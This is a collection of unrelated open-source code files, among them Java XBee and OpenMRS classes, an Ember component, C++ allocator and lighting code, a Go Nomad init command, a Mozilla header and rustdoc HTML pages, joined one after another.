* Returns the 64-bit sender/source address.
*
* @return The 64-bit sender/source address.
*
* @see com.digi.xbee.api.models.XBee64BitAddress
*/
public XBee64BitAddress <API key>() {
return sourceAddress64;
}
/**
* Returns the 16-bit sender/source address.
*
* @return 16-bit sender/source address.
*
* @see com.digi.xbee.api.models.XBee16BitAddress
*/
public XBee16BitAddress <API key>() {
return sourceAddress16;
}
/**
* Returns the receive options.
*
* @return Receive options.
*
* @see com.digi.xbee.api.models.XBeeReceiveOptions
*/
public int getReceiveOptions() {
return receiveOptions;
}
/**
* Returns the IO sample corresponding to the data contained in the packet.
*
* @return The IO sample of the packet, {@code null} if the packet has not
* any data or if the sample could not be generated correctly.
*
* @see com.digi.xbee.api.io.IOSample
*/
public IOSample getIOSample() {
return ioSample;
}
/**
* Sets the received RF data.
*
* @param rfData Received RF data.
*/
public void setRFData(byte[] rfData) {
if (rfData == null)
this.rfData = null;
else
this.rfData = Arrays.copyOf(rfData, rfData.length);
// Modify the ioSample accordingly.
if (rfData != null && rfData.length >= 5)
ioSample = new IOSample(this.rfData);
else
ioSample = null;
}
/**
* Returns the received RF data.
*
* @return Received RF data.
*/
public byte[] getRFData() {
if (rfData == null)
return null;
return Arrays.copyOf(rfData, rfData.length);
}
/*
* (non-Javadoc)
* @see com.digi.xbee.api.packet.XBeeAPIPacket#<API key>()
*/
@Override
public LinkedHashMap<String, String> <API key>() {
LinkedHashMap<String, String> parameters = new LinkedHashMap<String, String>();
parameters.put("64-bit source address", HexUtils.prettyHexString(sourceAddress64.toString()));
parameters.put("16-bit source address", HexUtils.prettyHexString(sourceAddress16.toString()));
parameters.put("Receive options", HexUtils.prettyHexString(HexUtils.integerToHexString(receiveOptions, 1)));
if (ioSample != null) {
parameters.put("Number of samples", HexUtils.prettyHexString(HexUtils.integerToHexString(1, 1))); // There is always 1 sample.
parameters.put("Digital channel mask", HexUtils.prettyHexString(HexUtils.integerToHexString(ioSample.getDigitalMask(), 2)));
parameters.put("Analog channel mask", HexUtils.prettyHexString(HexUtils.integerToHexString(ioSample.getAnalogMask(), 1)));
for (int i = 0; i < 16; i++) {
if (ioSample.hasDigitalValue(IOLine.getDIO(i)))
parameters.put(IOLine.getDIO(i).getName() + " digital value", ioSample.getDigitalValue(IOLine.getDIO(i)).getName());
}
for (int i = 0; i < 6; i++) {
if (ioSample.hasAnalogValue(IOLine.getDIO(i)))
parameters.put(IOLine.getDIO(i).getName() + " analog value", HexUtils.prettyHexString(HexUtils.integerToHexString(ioSample.getAnalogValue(IOLine.getDIO(i)), 2)));
}
if (ioSample.hasPowerSupplyValue())
try {
parameters.put("Power supply value", HexUtils.prettyHexString(HexUtils.integerToHexString(ioSample.getPowerSupplyValue(), 2)));
} catch (<API key> e) { }
} else if (rfData != null)
parameters.put("RF data", HexUtils.prettyHexString(HexUtils.<API key>(rfData)));
return parameters;
}
} |
import { inject as service } from '@ember/service';
import { or } from '@ember/object/computed';
import { isBlank } from '@ember/utils';
import { task, waitForEvent } from 'ember-concurrency';
import Component from '@ember/component';
import { set } from '@ember/object';
import FocusOnInsertMixin from 'vault/mixins/focus-on-insert';
import keys from 'vault/lib/keycodes';
const LIST_ROOT_ROUTE = 'vault.cluster.secrets.backend.list-root';
const SHOW_ROUTE = 'vault.cluster.secrets.backend.show';
export default Component.extend(FocusOnInsertMixin, {
router: service(),
wizard: service(),
mode: null,
emptyData: '{\n}',
onDataChange() {},
onRefresh() {},
model: null,
requestInFlight: or('model.isLoading', 'model.isReloading', 'model.isSaving'),
didReceiveAttrs() {
this._super(...arguments);
if (
(this.wizard.featureState === 'details' && this.mode === 'create') ||
(this.wizard.featureState === 'role' && this.mode === 'show')
) {
this.wizard.<API key>(this.wizard.featureState, 'CONTINUE', this.backendType);
}
if (this.wizard.featureState === 'displayRole') {
this.wizard.<API key>(this.wizard.featureState, 'NOOP', this.backendType);
}
},
willDestroyElement() {
this._super(...arguments);
if (this.model && this.model.isError) {
this.model.rollbackAttributes();
}
},
waitForKeyUp: task(function* () {
while (true) {
let event = yield waitForEvent(document.body, 'keyup');
this.onEscape(event);
}
})
.on('didInsertElement')
.cancelOn('willDestroyElement'),
transitionToRoute() {
this.router.transitionTo(...arguments);
},
onEscape(e) {
if (e.keyCode !== keys.ESC || this.mode !== 'show') {
return;
}
this.transitionToRoute(LIST_ROOT_ROUTE);
},
hasDataChanges() {
this.onDataChange(this.model.hasDirtyAttributes);
},
persist(method, successCallback) {
const model = this.model;
return model[method]().then(() => {
if (!model.isError) {
if (this.wizard.featureState === 'role') {
this.wizard.<API key>('role', 'CONTINUE', this.backendType);
}
successCallback(model);
}
});
},
actions: {
createOrUpdate(type, event) {
event.preventDefault();
const modelId = this.model.id;
// prevent from submitting if there's no key
// maybe do something fancier later
if (type === 'create' && isBlank(modelId)) {
return;
}
this.persist('save', () => {
this.hasDataChanges();
this.transitionToRoute(SHOW_ROUTE, modelId);
});
},
setValue(key, event) {
set(this.model, key, event.target.checked);
},
refresh() {
this.onRefresh();
},
delete() {
this.persist('destroyRecord', () => {
this.hasDataChanges();
this.transitionToRoute(LIST_ROOT_ROUTE);
});
},
codemirrorUpdated(attr, val, codemirror) {
codemirror.performLint();
const hasErrors = codemirror.state.lint.marked.length > 0;
if (!hasErrors) {
set(this.model, attr, JSON.parse(val));
}
},
},
}); |
#ADHydro Channel Output Viewer
*<API key>*
**This app is created to run in the Teyths programming environment. |
#include "legato.h"
COMPONENT_INIT
{
le_log_Level_t i;
le_log_Level_t origLevel = <API key>();
for(i = LE_LOG_DEBUG; i <= LE_LOG_EMERG; i++)
{
<API key>(i);
LE_DEBUG("frame %d msg", LE_LOG_DEBUG);
LE_INFO("frame %d msg", LE_LOG_INFO);
LE_WARN("frame %d msg", LE_LOG_WARN);
LE_ERROR("frame %d msg", LE_LOG_ERR);
LE_CRIT("frame %d msg", LE_LOG_CRIT);
LE_EMERG("frame %d msg", LE_LOG_EMERG);
}
// Restore original filter level -- required for RTOS where
// all apps share a single filter level.
<API key>(origLevel);
le_thread_Exit(0);
} |
package org.openmrs.module.webservices.rest.web.v1_0.resource.openmrs1_8;
import java.util.ArrayList;
import java.util.List;
import org.openmrs.Form;
import org.openmrs.FormField;
import org.openmrs.api.context.Context;
import org.openmrs.module.webservices.rest.web.RequestContext;
import org.openmrs.module.webservices.rest.web.RestConstants;
import org.openmrs.module.webservices.rest.web.annotation.PropertyGetter;
import org.openmrs.module.webservices.rest.web.annotation.Resource;
import org.openmrs.module.webservices.rest.web.annotation.SubResource;
import org.openmrs.module.webservices.rest.web.representation.<API key>;
import org.openmrs.module.webservices.rest.web.representation.FullRepresentation;
import org.openmrs.module.webservices.rest.web.representation.Representation;
import org.openmrs.module.webservices.rest.web.resource.impl.<API key>;
import org.openmrs.module.webservices.rest.web.resource.impl.<API key>;
import org.openmrs.module.webservices.rest.web.resource.impl.NeedsPaging;
import org.openmrs.module.webservices.rest.web.response.ResponseException;
/**
* {@link Resource} for {@link FormField}, supporting standard CRUD operations
*/
@SubResource(parent = FormResource1_8.class, path = "formfield", supportedClass = FormField.class, <API key> = {
"1.8.*", "1.9.*", "1.10.*", "1.11.*", "1.12.*", "2.0.*", "2.1.*" })
public class <API key> extends <API key><FormField, Form, FormResource1_8> {
/**
* @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#<API key>(org.openmrs.module.webservices.rest.web.representation.Representation)
*/
@Override
public <API key> <API key>(Representation rep) {
if (rep instanceof <API key>) {
<API key> description = new <API key>();
description.addProperty("uuid");
description.addProperty("display");
description.addProperty("parent", Representation.REF);
description.addProperty("form", Representation.REF);
description.addProperty("field", Representation.REF);
description.addProperty("fieldNumber");
description.addProperty("fieldPart");
description.addProperty("pageNumber");
description.addProperty("minOccurs");
description.addProperty("maxOccurs");
description.addProperty("required");
description.addProperty("sortWeight");
description.addProperty("retired");
description.addSelfLink();
description.addLink("full", ".?v=" + RestConstants.REPRESENTATION_FULL);
return description;
} else if (rep instanceof FullRepresentation) {
<API key> description = new <API key>();
description.addProperty("uuid");
description.addProperty("display");
description.addProperty("parent");
description.addProperty("form");
description.addProperty("field");
description.addProperty("fieldNumber");
description.addProperty("fieldPart");
description.addProperty("pageNumber");
description.addProperty("minOccurs");
description.addProperty("maxOccurs");
description.addProperty("required");
description.addProperty("sortWeight");
description.addProperty("retired");
description.addProperty("auditInfo");
description.addSelfLink();
return description;
}
return null;
}
/**
* @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#<API key>()
*/
@Override
public <API key> <API key>() {
<API key> description = new <API key>();
description.addRequiredProperty("form");
description.addRequiredProperty("field");
description.addRequiredProperty("required");
description.addProperty("parent");
description.addProperty("fieldNumber");
description.addProperty("fieldPart");
description.addProperty("pageNumber");
description.addProperty("minOccurs");
description.addProperty("maxOccurs");
description.addProperty("sortWeight");
return description;
}
/**
* Gets the display string.
*
* @param formField the formField name object
* @return the display string
*/
@PropertyGetter("display")
public String getDisplayString(FormField formField) {
return formField.getName();
}
/**
* @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#getByUniqueId(java.lang.String)
*/
@Override
public FormField getByUniqueId(String uniqueId) {
return Context.getFormService().getFormFieldByUuid(uniqueId);
}
/**
* @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#newDelegate()
*/
@Override
public FormField newDelegate() {
return new FormField();
}
/**
* @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#save(java.lang.Object)
*/
@Override
public FormField save(FormField delegate) {
return Context.getFormService().saveFormField(delegate);
}
/**
* @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#purge(java.lang.Object,
* org.openmrs.module.webservices.rest.web.RequestContext)
*/
@Override
public void purge(FormField delegate, RequestContext context) throws ResponseException {
if (delegate == null)
return;
Context.getFormService().purgeFormField(delegate);
}
/**
* @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#getParent(java.lang.Object)
*/
@Override
public Form getParent(FormField instance) {
return instance.getForm();
}
/**
* @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#setParent(java.lang.Object,
* java.lang.Object)
*/
@Override
public void setParent(FormField instance, Form parent) {
instance.setForm(parent);
}
/**
* @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#doGetAll(java.lang.Object,
* org.openmrs.module.webservices.rest.web.RequestContext)
*/
@Override
public NeedsPaging<FormField> doGetAll(Form parent, RequestContext context) throws ResponseException {
List<FormField> formFields = new ArrayList<FormField>();
for (FormField formField : parent.getFormFields()) {
if (!formField.isRetired()) {
formFields.add(formField);
}
}
return new NeedsPaging<FormField>(formFields, context);
}
/**
* @see org.openmrs.module.webservices.rest.web.resource.impl.<API key>#delete(java.lang.Object,
* java.lang.String, org.openmrs.module.webservices.rest.web.RequestContext)
*/
@Override
protected void delete(FormField delegate, String reason, RequestContext context) throws ResponseException {
delegate.setRetired(true);
delegate.setRetireReason(reason);
delegate.setRetiredBy(Context.<API key>());
Context.getFormService().saveFormField(delegate);
}
} |
#ifndef MALLOCALLOCATER_H_
#define MALLOCALLOCATER_H_
namespace NSHARE
{
template<class T>
struct malloc_allocater
{
typedef size_t size_type;
typedef std::ptrdiff_t difference_type;
typedef T* pointer;
typedef const T* const_pointer;
typedef T& reference;
typedef const T& const_reference;
typedef T value_type;
template<class U> struct rebind
{
typedef malloc_allocater<U> other;
};
malloc_allocater() throw ()
{
}
malloc_allocater(const malloc_allocater&) throw ()
{
}
template<class U> malloc_allocater(const malloc_allocater<U>&) throw ()
{
}
~malloc_allocater() throw ()
{
}
pointer address(reference x) const
{
return &x;
}
const_pointer address(const_reference x) const
{
return &x;
}
pointer allocate(size_type s, void const * = NULL)
{
using namespace std;
if (0 == s)
return NULL;
pointer temp = (pointer) malloc(s * sizeof(T));
if (temp == NULL)
throw std::bad_alloc();
return temp;
}
void deallocate(pointer p, size_type)
{
using namespace std;
free(p);
}
pointer reallocate(pointer p, size_type _new_size)
{
return(pointer) std::realloc(p, _new_size);
}
size_type max_size() const throw ()
{
return std::numeric_limits<size_t>::max() / sizeof(T);
}
void construct(pointer p, const T& val)
{
new ((void *) p) T(val);
}
void destroy(pointer p)
{
p->~T();
}
};
} /* namespace NSHARE */
#endif /* MALLOCALLOCATER_H_ */ |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `XK_Hcircumflex` constant in crate `x11_dl`.">
<meta name="keywords" content="rust, rustlang, rust-lang, XK_Hcircumflex">
<title>x11_dl::keysym::XK_Hcircumflex - Rust</title>
<link rel="stylesheet" type="text/css" href="../../rustdoc.css">
<link rel="stylesheet" type="text/css" href="../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<nav class="sidebar">
<p class='location'><a href='../index.html'>x11_dl</a>::<wbr><a href='index.html'>keysym</a></p><script>window.sidebarCurrent = {name: 'XK_Hcircumflex', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</nav>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content constant">
<h1 class='fqn'><span class='in-band'><a href='../index.html'>x11_dl</a>::<wbr><a href='index.html'>keysym</a>::<wbr><a class='constant' href=''>XK_Hcircumflex</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-856' class='srclink' href='../../src/x11_dl/keysym.rs.html#427' title='goto source code'>[src]</a></span></h1>
<pre class='rust const'>pub const XK_Hcircumflex: <a class='type' href='../../std/os/raw/type.c_uint.html' title='std::os::raw::c_uint'>c_uint</a><code> = </code><code>678</code></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<aside id="help" class="hidden">
<div>
<h1 class="hidden">Help</h1>
<div class="shortcuts">
<h2>Keyboard Shortcuts</h2>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
<dt>+</dt>
<dd>Collapse/expand all sections</dd>
</dl>
</div>
<div class="infos">
<h2>Search Tricks</h2>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code> or <code>* -> vec</code>)
</p>
</div>
</div>
</aside>
<script>
window.rootPath = "../../";
window.currentCrate = "x11_dl";
window.playgroundUrl = "";
</script>
<script src="../../jquery.js"></script>
<script src="../../main.js"></script>
<script defer src="../../search-index.js"></script>
</body>
</html> |
package com.snap2d.editor;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.awt.event.WindowAdapter;
import java.awt.event.WindowEvent;
import javax.swing.JFrame;
import javax.swing.JMenu;
import javax.swing.JMenuBar;
import javax.swing.JMenuItem;
import javax.swing.JOptionPane;
import javax.swing.JScrollPane;
import javax.swing.UIManager;
import javax.swing.WindowConstants;
/**
* @author Brian Groenke
*
*/
public class SpriteEditor extends JFrame {
private static final long serialVersionUID = -<API key>;
public static final int DEFAULT_SIZE = 750;
public static final String TITLE = "Snapdragon2D Sprite Editor";
private static SpriteEditor editor;
JFrame frame = this;
EditPanel canvas;
JScrollPane scroller;
JMenuBar menuBar = new JMenuBar();
JMenu file = new JMenu("File");
JMenuItem open, save, exit;
public SpriteEditor() {
canvas = new EditPanel(this);
scroller = new JScrollPane(canvas);
add(scroller);
this.setSize(DEFAULT_SIZE, DEFAULT_SIZE);
this.<API key>(null);
this.setTitle(TITLE);
this.<API key>(WindowConstants.DO_NOTHING_ON_CLOSE);
this.addWindowListener(new WindowAdapter() {
@Override
public void windowClosing(final WindowEvent evt) {
exit();
}
});
menuBar.add(file);
open = new JMenuItem("Open");
open.addActionListener(new ActionListener() {
@Override
public void actionPerformed(final ActionEvent e) {
canvas.load();
}
});
file.add(open);
save = new JMenuItem("Save");
save.addActionListener(new ActionListener() {
@Override
public void actionPerformed(final ActionEvent e) {
canvas.save();
}
});
file.add(save);
exit = new JMenuItem("Exit");
exit.addActionListener(new ActionListener() {
@Override
public void actionPerformed(final ActionEvent e) {
exit();
}
});
file.add(exit);
this.setJMenuBar(menuBar);
}
public void updateScrollPane() {
scroller.revalidate();
scroller.repaint();
}
private final void exit() {
int resp = JOptionPane.YES_OPTION;
if (canvas.fileStatus == EditPanel.CHANGED) {
resp = JOptionPane.showConfirmDialog(frame,
"Exit without saving?",
"Confirm Exit",
JOptionPane.<API key>);
switch (resp) {
case JOptionPane.NO_OPTION:
boolean chk = canvas.save();
if ( !chk) {
return;
}
case JOptionPane.YES_OPTION:
frame.dispose();
System.exit(0);
break;
default:
}
} else {
System.exit(0);
}
}
/**
* @param args
*/
public static void main(final String[] args) {
try {
UIManager.setLookAndFeel(UIManager.<API key>());
} catch (Exception e) {
e.printStackTrace();
}
editor = new SpriteEditor();
editor.setVisible(true);
}
} |
#include "LightingManager.h"
#include "Color.h"
#include "LightComponent.h"
#include "LightFilter.h"
#include "LightSource.h"
#include "LightStatus.h"
#include "Logs.h"
#include "SurfaceMaterial.h"
#include <algorithm>
#include <cmath>
LightingManager::LightingManager() {
specularity = true;
filtering = true;
}
int LightingManager::<API key>() const {
return static_lights.size();
}
int LightingManager::getSourcesCount() const {
return sources.size();
}
int LightingManager::getFiltersCount() const {
return filters.size();
}
void LightingManager::clearStaticLights() {
static_lights.clear();
}
void LightingManager::addStaticLight(const LightComponent &light) {
static_lights.push_back(light);
}
void LightingManager::clearSources() {
sources.clear();
}
void LightingManager::registerSource(LightSource *source) {
if (find(sources.begin(), sources.end(), source) == sources.end()) {
sources.push_back(source);
}
}
void LightingManager::unregisterSource(LightSource *source) {
if (find(sources.begin(), sources.end(), source) != sources.end()) {
sources.erase(find(sources.begin(), sources.end(), source));
}
}
void LightingManager::clearFilters() {
filters.clear();
}
void LightingManager::registerFilter(LightFilter *filter) {
if (find(filters.begin(), filters.end(), filter) == filters.end()) {
filters.push_back(filter);
}
}
void LightingManager::unregisterFilter(LightFilter *filter) {
if (find(filters.begin(), filters.end(), filter) != filters.end()) {
filters.erase(find(filters.begin(), filters.end(), filter));
}
}
bool LightingManager::alterLight(LightComponent &component, const Vector3 &location) {
if (filtering and component.altered) {
for (auto filter : filters) {
if (not filter->applyLightFilter(component, location)) {
return false;
}
}
}
if (not specularity) {
component.reflection = 0.0;
}
return component.color.getPower() > 0.0001;
}
void LightingManager::setSpecularity(bool enabled) {
specularity = enabled;
}
void LightingManager::setFiltering(bool enabled) {
filtering = enabled;
}
Color LightingManager::applyFinalComponent(const LightComponent &component, const Vector3 &eye, const Vector3 &location,
const Vector3 &normal, const SurfaceMaterial &material) {
Color result, light_color;
Vector3 direction_inv;
light_color = component.color;
direction_inv = component.direction.normalize().scale(-1.0);
normal.normalize();
result = COLOR_BLACK;
/* diffused light */
double diffuse = direction_inv.dotProduct(normal);
double sign = (diffuse < 0.0) ? -1.0 : 1.0;
if (material.hardness <= 0.5) {
double hardness = material.hardness * 2.0;
diffuse = (1.0 - hardness) * (diffuse * diffuse) * sign + hardness * diffuse;
} else if (diffuse != 0.0) {
double hardness = (material.hardness - 0.5) * 2.0;
diffuse = (1.0 - hardness) * diffuse + hardness * sign * sqrt(fabs(diffuse));
}
if (material.ambient > 0.0) {
diffuse = material.ambient + (1.0 - material.ambient) * diffuse;
}
if (diffuse > 0.0) {
result.r += diffuse * material.base->r * light_color.r;
result.g += diffuse * material.base->g * light_color.g;
result.b += diffuse * material.base->b * light_color.b;
}
/* specular reflection */
if (specularity && sign > 0.0 && material.shininess > 0.0 && material.reflection > 0.0 &&
component.reflection > 0.0) {
Vector3 view = location.sub(eye).normalize();
Vector3 reflect = direction_inv.sub(normal.scale(2.0 * direction_inv.dotProduct(normal)));
double specular = reflect.dotProduct(view);
if (specular > 0.0) {
specular = pow(specular, material.shininess) * material.reflection * component.reflection;
if (specular > 0.0) {
result.r += specular * light_color.r;
result.g += specular * light_color.g;
result.b += specular * light_color.b;
}
}
}
/* specular reflection with fresnel effect */
/*if (material->reflection > 0.0 && light->reflection > 0.0)
{
Vector3 view = v3Normalize(v3Sub(location, eye));
Vector3 h = v3Normalize(v3Sub(direction_inv, view));
double fresnel = 0.02 + 0.98 * pow(1.0 - v3Dot(v3Scale(view, -1.0), h), 5.0);
double refl = v3Dot(h, normal);
if (refl > 0.0)
{
double waterBrdf = fresnel * pow(refl, material->shininess);
if (waterBrdf > 0.0)
{
refl = material->reflection * waterBrdf * light->reflection;
result.r += refl * light_color.r;
result.g += refl * light_color.g;
result.b += refl * light_color.b;
}
}
}*/
return result;
}
void LightingManager::fillStatus(LightStatus &status, const Vector3 &location) const {
for (auto &light : static_lights) {
status.pushComponent(light);
}
for (auto source : sources) {
vector<LightComponent> lights;
if (source->getLightsAt(lights, location)) {
for (auto &light : lights) {
status.pushComponent(light);
}
}
}
}
Color LightingManager::apply(const Vector3 &eye, const Vector3 &location, const Vector3 &normal,
const SurfaceMaterial &material) {
LightStatus status(this, location, eye);
fillStatus(status, location);
return status.apply(normal, material);
} |
package command
import (
"fmt"
"io/ioutil"
"os"
"strings"
)
const (
// DefaultInitName is the default name we use when
// initializing the example file
DefaultInitName = "example.nomad"
)
// InitCommand generates a new job template that you can customize to your
// liking, like vagrant init
type InitCommand struct {
Meta
}
func (c *InitCommand) Help() string {
helpText := `
Usage: nomad init
Creates an example job file that can be used as a starting
point to customize further.
`
return strings.TrimSpace(helpText)
}
func (c *InitCommand) Synopsis() string {
return "Create an example job file"
}
func (c *InitCommand) Run(args []string) int {
// Check for misuse
if len(args) != 0 {
c.Ui.Error(c.Help())
return 1
}
// Check if the file already exists
_, err := os.Stat(DefaultInitName)
if err != nil && !os.IsNotExist(err) {
c.Ui.Error(fmt.Sprintf("Failed to stat '%s': %v", DefaultInitName, err))
return 1
}
if !os.IsNotExist(err) {
c.Ui.Error(fmt.Sprintf("Job '%s' already exists", DefaultInitName))
return 1
}
// Write out the example
err = ioutil.WriteFile(DefaultInitName, []byte(defaultJob), 0660)
if err != nil {
c.Ui.Error(fmt.Sprintf("Failed to write '%s': %v", DefaultInitName, err))
return 1
}
// Success
c.Ui.Output(fmt.Sprintf("Example job file written to %s", DefaultInitName))
return 0
}
var defaultJob = strings.TrimSpace(`
# There can only be a single job definition per file.
# Create a job with ID and Name 'example'
job "example" {
# Run the job in the global region, which is the default.
# region = "global"
# Specify the datacenters within the region this job can run in.
datacenters = ["dc1"]
# Service type jobs optimize for long-lived services. This is
# the default but we can change to batch for short-lived tasks.
# type = "service"
# Priority controls our access to resources and scheduling priority.
# This can be 1 to 100, inclusively, and defaults to 50.
# priority = 50
# Restrict our job to only linux. We can specify multiple
# constraints as needed.
constraint {
attribute = "${attr.kernel.name}"
value = "linux"
}
# Configure the job to do rolling updates
update {
# Stagger updates every 10 seconds
stagger = "10s"
# Update a single task at a time
max_parallel = 1
}
# Create a 'cache' group. Each task in the group will be
# scheduled onto the same machine.
group "cache" {
# Control the number of instances of this group.
# Defaults to 1
# count = 1
# Configure the restart policy for the task group. If not provided, a
# default is used based on the job type.
restart {
# The number of attempts to run the job within the specified interval.
attempts = 10
interval = "5m"
# A delay between a task failing and a restart occurring.
delay = "25s"
# Mode controls what happens when a task has restarted "attempts"
# times within the interval. "delay" mode delays the next restart
# till the next interval. "fail" mode does not restart the task if
# "attempts" has been hit within the interval.
mode = "delay"
}
ephemeral_disk {
# When sticky is true and the task group is updated, the scheduler
# will prefer to place the updated allocation on the same node and
# will migrate the data. This is useful for tasks that store data
# that should persist across allocation updates.
# sticky = true
# Size of the shared ephemeral disk between tasks in the task group.
size = 300
}
# Define a task to run
task "redis" {
# Use Docker to run the task.
driver = "docker"
# Configure Docker driver with the image
config {
image = "redis:latest"
port_map {
db = 6379
}
}
service {
name = "${TASKGROUP}-redis"
tags = ["global", "cache"]
port = "db"
check {
name = "alive"
type = "tcp"
interval = "10s"
timeout = "2s"
}
}
# We must specify the resources required for
# this task to ensure it runs on a machine with
# enough capacity.
resources {
cpu = 500 # 500 MHz
memory = 256 # 256MB
network {
mbits = 10
port "db" {
}
}
}
# The artifact block can be specified one or more times to download
# artifacts prior to the task being started. This is convenient for
# shipping configs or data needed by the task.
# artifact {
# options {
# checksum = "md5:<API key>"
# Specify configuration related to log rotation
# logs {
# max_files = 10
# max_file_size = 15
# Controls the timeout between signalling a task it will be killed
# and killing the task. If not set a default is used.
# kill_timeout = "20s"
}
}
}
`) |
// |jit-test| error:RangeError;
load(libdir + "immutable-prototype.js");
if (!this.hasOwnProperty("TypedObject"))
throw new RangeError();
if (<API key>())
this.__proto__ = Proxy.create({});
new TypedObject.StructType; |
#ifndef <API key>
#define <API key>
#include "mozilla/ErrorResult.h"
#include "nsISupportsImpl.h"
#include "mozilla/<API key>.h"
#include "mozilla/dom/BindingUtils.h"
#include "nsPIDOMWindow.h"
#include "mozilla/media/<API key>.h"
namespace mozilla {
namespace dom {
class Promise;
struct <API key>;
struct <API key>;
#define <API key> \
{ 0x2f784d8a, 0x7485, 0x4280, \
{ 0x9a, 0x36, 0x74, 0xa4, 0xd6, 0x71, 0xa6, 0xc8 } }
class MediaDevices final : public <API key>
,public <API key>
{
public:
explicit MediaDevices(nsPIDOMWindowInner* aWindow) :
<API key>(aWindow) {}
<API key>
<API key>(<API key>)
JSObject* WrapObject(JSContext* cx, JS::Handle<JSObject*> aGivenProto) override;
// No code needed, as <API key> members default to true.
void <API key>(<API key>& aResult) {};
already_AddRefed<Promise>
GetUserMedia(const <API key>& aConstraints, ErrorResult &aRv);
already_AddRefed<Promise>
EnumerateDevices(ErrorResult &aRv);
virtual void OnDeviceChange() override;
mozilla::dom::EventHandlerNonNull* GetOndevicechange();
void SetOndevicechange(mozilla::dom::EventHandlerNonNull* aCallback);
NS_IMETHOD AddEventListener(const nsAString& aType,
nsIDOMEventListener* aListener,
bool aUseCapture, bool aWantsUntrusted,
uint8_t optional_argc) override;
virtual void AddEventListener(const nsAString& aType,
dom::EventListener* aListener,
const dom::<API key>& aOptions,
const dom::Nullable<bool>& aWantsUntrusted,
ErrorResult& aRv) override;
private:
class GumResolver;
class EnumDevResolver;
class GumRejecter;
virtual ~MediaDevices();
nsCOMPtr<nsITimer> mFuzzTimer;
};
<API key>(MediaDevices,
<API key>)
} // namespace dom
} // namespace mozilla
#endif // <API key> |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `<API key>` constant in crate `wayland_kbd`.">
<meta name="keywords" content="rust, rustlang, rust-lang, <API key>">
<title>wayland_kbd::keysyms::<API key> - Rust</title>
<link rel="stylesheet" type="text/css" href="../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]
<section class="sidebar">
<p class='location'><a href='../index.html'>wayland_kbd</a>::<wbr><a href='index.html'>keysyms</a></p><script>window.sidebarCurrent = {name: '<API key>', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content constant">
<h1 class='fqn'><span class='in-band'><a href='../index.html'>wayland_kbd</a>::<wbr><a href='index.html'>keysyms</a>::<wbr><a class='constant' href=''><API key></a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-2624' class='srclink' href='../../src/wayland_kbd/ffi/keysyms.rs.html#1112' title='goto source code'>[src]</a></span></h1>
<pre class='rust const'>pub const <API key>: <a href='../../std/primitive.u32.html'>u32</a><code> = </code><code>0x10004ba</code></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../";
window.currentCrate = "wayland_kbd";
window.playgroundUrl = "";
</script>
<script src="../../jquery.js"></script>
<script src="../../main.js"></script>
<script async src="../../search-index.js"></script>
</body>
</html> |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
